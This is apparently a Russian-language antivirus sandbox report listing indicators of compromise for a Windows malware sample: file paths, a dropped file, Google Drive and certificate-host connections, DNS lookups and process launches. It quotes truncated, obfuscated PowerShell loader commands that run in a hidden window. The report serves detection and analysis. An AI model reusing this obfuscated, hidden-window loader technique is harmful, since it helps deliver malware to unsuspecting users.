Техническая информация
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %APPDATA%\cabassou.tun
- 'drive.google.com':443
- 'pk#.goog':80
- 'microsoft.com':80
- 'drive.usercontent.google.com':443
- http://pk#.goog/gsr1/gsr1.crt
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- 'drive.google.com':443
- 'drive.usercontent.google.com':443
- DNS ASK drive.google.com
- DNS ASK pk#.goog
- DNS ASK microsoft.com
- DNS ASK drive.usercontent.google.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+...
- '<SYSTEM32>\cmd.exe' /c "echo %appdata%\Cabassou.Tun && echo $"